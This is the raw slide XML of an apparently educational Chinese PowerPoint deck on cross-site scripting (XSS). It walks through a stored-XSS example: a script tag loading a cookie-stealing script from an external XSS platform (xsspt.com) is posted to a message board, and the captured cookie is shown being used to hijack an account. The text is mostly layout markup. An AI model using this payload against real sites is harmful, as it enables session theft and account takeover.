                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>修改页面的DOM节点形成的XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，不经过服务器处理</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p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C3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>目录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32890" y="1328821"/>
            <a:ext cx="504056" cy="398780"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="E2231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32890" y="2622688"/>
            <a:ext cx="504056" cy="398780"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="E2231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</a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="TextBox 15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1732890" y="3263894"/>
            <a:ext cx="504056" cy="398780"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="E2231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4</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="文本占位符 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2457613" y="1225421"/>
            <a:ext cx="3883789" cy="431502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200" b="1" dirty="0"/>
              <a:t>漏洞类型</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="文本占位符 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2456944" y="2527126"/>
            <a:ext cx="3884458" cy="400436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sz="3200" b="1" dirty="0"/>
              <a:t>漏洞介绍</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="文本占位符 9"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2440241" y="3215166"/>
            <a:ext cx="3882111" cy="409215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200" b="1" dirty="0"/>
              <a:t>漏洞案例</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3200" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="文本占位符 9"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1247204" y="1192691"/>
            <a:ext cx="3882111" cy="409215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3200" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1733525" y="3985398"/>
            <a:ext cx="504056" cy="398780"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="E2231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5</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="文本占位符 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2457579" y="3889836"/>
            <a:ext cx="3884458" cy="400436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sz="3200" b="1" dirty="0"/>
              <a:t>防御与测试</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1733525" y="1975251"/>
            <a:ext cx="504056" cy="398780"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="E2231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</a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文本占位符 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2458248" y="1871851"/>
            <a:ext cx="3883789" cy="431502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200" b="1" dirty="0"/>
              <a:t>扫描要求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3" grpId="0" bldLvl="0" animBg="1"/>
      <p:bldP spid="17" grpId="0" build="p"/>
      <p:bldP spid="18" grpId="0" build="p"/>
      <p:bldP spid="19" grpId="0" build="p"/>
      <p:bldP spid="20" grpId="0" build="p"/>
      <p:bldP spid="3" grpId="0" bldLvl="0" animBg="1"/>
      <p:bldP spid="4" grpId="0" build="p"/>
      <p:bldP spid="5" grpId="0" bldLvl="0" animBg="1"/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504453" y="288518"/>
            <a:ext cx="612068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CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>跨站脚本攻击</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC33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C3300"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>攻击实例</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="CC3300"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="CC33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" y="1079500"/>
            <a:ext cx="5318125" cy="520827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308090" y="2897505"/>
            <a:ext cx="4671695" cy="1290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、在</a:t>
            </a:r>
            <a:r>
              <a:rPr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存在XSS漏洞的地方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填写：</a:t>
            </a:r>
            <a:endParaRPr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&lt;script src=http://xsspt.com/J8Eh6r?1542529756&gt;&lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr altLang="zh-CN" sz="1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（这个地址有一个获取用户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cookie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的脚本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endParaRPr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、提交留言，代码将被执行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allAtOnce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504453" y="288518"/>
            <a:ext cx="612068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CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>跨站脚本攻击</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC33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C3300"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>攻击实例</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="CC3300"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="CC33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559550" y="1441450"/>
            <a:ext cx="4857115" cy="152971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、在留言板中</a:t>
            </a:r>
            <a:r>
              <a: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查看网页源代码，查看主题的地方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&lt;script src=http://xsspt.com/J8Eh6r?1542528967&gt;&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a: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已写进网页中</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pP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、用Chrome F12，打开Source，发现网页加载了xsspt.com，说明XSS成功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381760"/>
            <a:ext cx="5987415" cy="16497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" y="3327400"/>
            <a:ext cx="6045835" cy="1444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9550" y="3031490"/>
            <a:ext cx="4450715" cy="33432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allAtOnce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504453" y="288518"/>
            <a:ext cx="612068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CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>跨站脚本攻击</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC33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C3300"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>攻击实例</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="CC3300"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="CC33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141085" y="3277870"/>
            <a:ext cx="4605655" cy="8102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打开获取用户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cookie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的脚本的平台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发现已经成功拿到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cookie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有了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cookie，攻击者可以不通过密码，而直接登录进用户的账户。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7745"/>
            <a:ext cx="5297170" cy="49517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532" y="-5785"/>
            <a:ext cx="11518986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90"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="直角三角形 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="7202322" y="3898481"/>
            <a:ext cx="4313646" cy="2581694"/>
          </a:xfrm>
          <a:prstGeom prst="rtTriangle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75">
              <a:solidFill>
                <a:prstClr val="whit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06911" y="1443999"/>
            <a:ext cx="1475998" cy="7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425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06911" y="2233960"/>
            <a:ext cx="1475998" cy="7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425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03305" y="2998652"/>
            <a:ext cx="1475998" cy="7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zh-CN" altLang="en-US" sz="425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03305" y="3766100"/>
            <a:ext cx="1475998" cy="7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zh-CN" altLang="en-US" sz="425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47"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2321678" y="1584460"/>
            <a:ext cx="4091714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86393" tIns="43197" rIns="86393" bIns="4319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13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做最好的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="13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3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，给最好的你。更多作品请在稻壳儿搜索：没有肉的鸡腿。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1325" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="矩形 47"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2321678" y="2324570"/>
            <a:ext cx="4091714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86393" tIns="43197" rIns="86393" bIns="4319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13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做最好的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="13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3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，给最好的你。更多作品请在稻壳儿搜索：没有肉的鸡腿。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1325" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="矩形 47"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2321678" y="3131431"/>
            <a:ext cx="4091714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86393" tIns="43197" rIns="86393" bIns="4319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13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做最好的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="13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3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，给最好的你。更多作品请在稻壳儿搜索：没有肉的鸡腿。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1325" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="矩形 47"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2321678" y="3898481"/>
            <a:ext cx="4091714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86393" tIns="43197" rIns="86393" bIns="4319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13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做最好的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="13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3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，给最好的你。更多作品请在稻壳儿搜索：没有肉的鸡腿。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1325" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="文本占位符 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="504453" y="503783"/>
            <a:ext cx="612068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CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>跨站脚本攻击</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC33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C3300"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>如何发现</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="CC3300"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="CC3300"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Freeform 104"/>
          <p:cNvSpPr>
            <a:spLocks noEditPoints="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="775850" y="1790859"/>
            <a:ext cx="2743676" cy="953871"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 618 w 620"/>
              <a:gd name="T1" fmla="*/ 72 h 185"/>
              <a:gd name="T2" fmla="*/ 587 w 620"/>
              <a:gd name="T3" fmla="*/ 35 h 185"/>
              <a:gd name="T4" fmla="*/ 565 w 620"/>
              <a:gd name="T5" fmla="*/ 18 h 185"/>
              <a:gd name="T6" fmla="*/ 598 w 620"/>
              <a:gd name="T7" fmla="*/ 95 h 185"/>
              <a:gd name="T8" fmla="*/ 560 w 620"/>
              <a:gd name="T9" fmla="*/ 152 h 185"/>
              <a:gd name="T10" fmla="*/ 492 w 620"/>
              <a:gd name="T11" fmla="*/ 168 h 185"/>
              <a:gd name="T12" fmla="*/ 338 w 620"/>
              <a:gd name="T13" fmla="*/ 168 h 185"/>
              <a:gd name="T14" fmla="*/ 144 w 620"/>
              <a:gd name="T15" fmla="*/ 164 h 185"/>
              <a:gd name="T16" fmla="*/ 37 w 620"/>
              <a:gd name="T17" fmla="*/ 170 h 185"/>
              <a:gd name="T18" fmla="*/ 279 w 620"/>
              <a:gd name="T19" fmla="*/ 168 h 185"/>
              <a:gd name="T20" fmla="*/ 413 w 620"/>
              <a:gd name="T21" fmla="*/ 171 h 185"/>
              <a:gd name="T22" fmla="*/ 516 w 620"/>
              <a:gd name="T23" fmla="*/ 171 h 185"/>
              <a:gd name="T24" fmla="*/ 543 w 620"/>
              <a:gd name="T25" fmla="*/ 170 h 185"/>
              <a:gd name="T26" fmla="*/ 549 w 620"/>
              <a:gd name="T27" fmla="*/ 170 h 185"/>
              <a:gd name="T28" fmla="*/ 408 w 620"/>
              <a:gd name="T29" fmla="*/ 178 h 185"/>
              <a:gd name="T30" fmla="*/ 267 w 620"/>
              <a:gd name="T31" fmla="*/ 182 h 185"/>
              <a:gd name="T32" fmla="*/ 132 w 620"/>
              <a:gd name="T33" fmla="*/ 179 h 185"/>
              <a:gd name="T34" fmla="*/ 13 w 620"/>
              <a:gd name="T35" fmla="*/ 181 h 185"/>
              <a:gd name="T36" fmla="*/ 2 w 620"/>
              <a:gd name="T37" fmla="*/ 177 h 185"/>
              <a:gd name="T38" fmla="*/ 9 w 620"/>
              <a:gd name="T39" fmla="*/ 159 h 185"/>
              <a:gd name="T40" fmla="*/ 66 w 620"/>
              <a:gd name="T41" fmla="*/ 102 h 185"/>
              <a:gd name="T42" fmla="*/ 48 w 620"/>
              <a:gd name="T43" fmla="*/ 60 h 185"/>
              <a:gd name="T44" fmla="*/ 56 w 620"/>
              <a:gd name="T45" fmla="*/ 17 h 185"/>
              <a:gd name="T46" fmla="*/ 194 w 620"/>
              <a:gd name="T47" fmla="*/ 14 h 185"/>
              <a:gd name="T48" fmla="*/ 282 w 620"/>
              <a:gd name="T49" fmla="*/ 7 h 185"/>
              <a:gd name="T50" fmla="*/ 429 w 620"/>
              <a:gd name="T51" fmla="*/ 9 h 185"/>
              <a:gd name="T52" fmla="*/ 536 w 620"/>
              <a:gd name="T53" fmla="*/ 3 h 185"/>
              <a:gd name="T54" fmla="*/ 494 w 620"/>
              <a:gd name="T55" fmla="*/ 2 h 185"/>
              <a:gd name="T56" fmla="*/ 330 w 620"/>
              <a:gd name="T57" fmla="*/ 5 h 185"/>
              <a:gd name="T58" fmla="*/ 217 w 620"/>
              <a:gd name="T59" fmla="*/ 9 h 185"/>
              <a:gd name="T60" fmla="*/ 78 w 620"/>
              <a:gd name="T61" fmla="*/ 10 h 185"/>
              <a:gd name="T62" fmla="*/ 26 w 620"/>
              <a:gd name="T63" fmla="*/ 21 h 185"/>
              <a:gd name="T64" fmla="*/ 23 w 620"/>
              <a:gd name="T65" fmla="*/ 20 h 185"/>
              <a:gd name="T66" fmla="*/ 19 w 620"/>
              <a:gd name="T67" fmla="*/ 32 h 185"/>
              <a:gd name="T68" fmla="*/ 27 w 620"/>
              <a:gd name="T69" fmla="*/ 51 h 185"/>
              <a:gd name="T70" fmla="*/ 56 w 620"/>
              <a:gd name="T71" fmla="*/ 100 h 185"/>
              <a:gd name="T72" fmla="*/ 11 w 620"/>
              <a:gd name="T73" fmla="*/ 153 h 185"/>
              <a:gd name="T74" fmla="*/ 0 w 620"/>
              <a:gd name="T75" fmla="*/ 173 h 185"/>
              <a:gd name="T76" fmla="*/ 0 w 620"/>
              <a:gd name="T77" fmla="*/ 185 h 185"/>
              <a:gd name="T78" fmla="*/ 7 w 620"/>
              <a:gd name="T79" fmla="*/ 182 h 185"/>
              <a:gd name="T80" fmla="*/ 97 w 620"/>
              <a:gd name="T81" fmla="*/ 181 h 185"/>
              <a:gd name="T82" fmla="*/ 231 w 620"/>
              <a:gd name="T83" fmla="*/ 185 h 185"/>
              <a:gd name="T84" fmla="*/ 370 w 620"/>
              <a:gd name="T85" fmla="*/ 184 h 185"/>
              <a:gd name="T86" fmla="*/ 549 w 620"/>
              <a:gd name="T87" fmla="*/ 181 h 185"/>
              <a:gd name="T88" fmla="*/ 557 w 620"/>
              <a:gd name="T89" fmla="*/ 171 h 185"/>
              <a:gd name="T90" fmla="*/ 611 w 620"/>
              <a:gd name="T91" fmla="*/ 94 h 185"/>
              <a:gd name="T92" fmla="*/ 620 w 620"/>
              <a:gd name="T93" fmla="*/ 82 h 185"/>
              <a:gd name="T94" fmla="*/ 44 w 620"/>
              <a:gd name="T95" fmla="*/ 76 h 185"/>
              <a:gd name="T96" fmla="*/ 26 w 620"/>
              <a:gd name="T97" fmla="*/ 35 h 185"/>
              <a:gd name="T98" fmla="*/ 24 w 620"/>
              <a:gd name="T99" fmla="*/ 24 h 185"/>
              <a:gd name="T100" fmla="*/ 60 w 620"/>
              <a:gd name="T101" fmla="*/ 94 h 185"/>
              <a:gd name="T102" fmla="*/ 59 w 620"/>
              <a:gd name="T103" fmla="*/ 105 h 185"/>
              <a:gd name="T104" fmla="*/ 602 w 620"/>
              <a:gd name="T105" fmla="*/ 102 h 185"/>
              <a:gd name="T106" fmla="*/ 552 w 620"/>
              <a:gd name="T107" fmla="*/ 173 h 185"/>
              <a:gd name="T108" fmla="*/ 558 w 620"/>
              <a:gd name="T109" fmla="*/ 164 h 185"/>
              <a:gd name="T110" fmla="*/ 553 w 620"/>
              <a:gd name="T111" fmla="*/ 163 h 185"/>
              <a:gd name="T112" fmla="*/ 553 w 620"/>
              <a:gd name="T113" fmla="*/ 163 h 185"/>
              <a:gd name="T114" fmla="*/ 607 w 620"/>
              <a:gd name="T115" fmla="*/ 89 h 185"/>
              <a:gd name="T116" fmla="*/ 616 w 620"/>
              <a:gd name="T117" fmla="*/ 83 h 185"/>
              <a:gd name="T118" fmla="*/ 602 w 620"/>
              <a:gd name="T119" fmla="*/ 102 h 18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620" h="185">
                <a:moveTo>
                  <a:pt x="620" y="80"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="620" y="80"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="619" y="78"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="619" y="75"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="618" y="72"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="602" y="54"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="587" y="35"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="569" y="17"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="552" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="550" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="565" y="18"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="580" y="35"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="597" y="56"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="615" y="75"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="598" y="95"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="582" y="116"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="574" y="128"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="565" y="141"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="560" y="152"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="550" y="164"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="521" y="167"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="507" y="167"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="492" y="168"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="457" y="167"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="419" y="167"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="356" y="168"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="338" y="168"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="322" y="167"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="304" y="166"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="286" y="164"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="216" y="164"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="144" y="164"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="74" y="166"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="170"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="37" y="170"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="70" y="168"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="103" y="167"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="136" y="167"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="279" y="168"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="313" y="170"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="349" y="173"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="364" y="173"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="381" y="173"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="413" y="171"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="448" y="171"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="485" y="171"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="501" y="171"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="516" y="171"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="546" y="168"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="545" y="168"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="543" y="170"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="546" y="168"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="549" y="168"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="549" y="170"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="549" y="178"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="514" y="177"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="479" y="177"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="408" y="178"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="374" y="181"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="340" y="182"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="302" y="182"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="267" y="182"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="234" y="184"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="202" y="182"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="166" y="179"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="132" y="179"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="95" y="179"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="59" y="179"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="29" y="179"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13" y="181"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="182"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="184"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="181"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="177"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="170"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="167"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="163"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="159"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15" y="152"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="34" y="133"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="49" y="117"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="66" y="102"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="67" y="101"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="67" y="100"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="59" y="79"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="48" y="60"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="37" y="42"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="27" y="21"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="56" y="17"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="70" y="16"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="85" y="16"/>
                </a:lnTo>
                <a:lnTo>
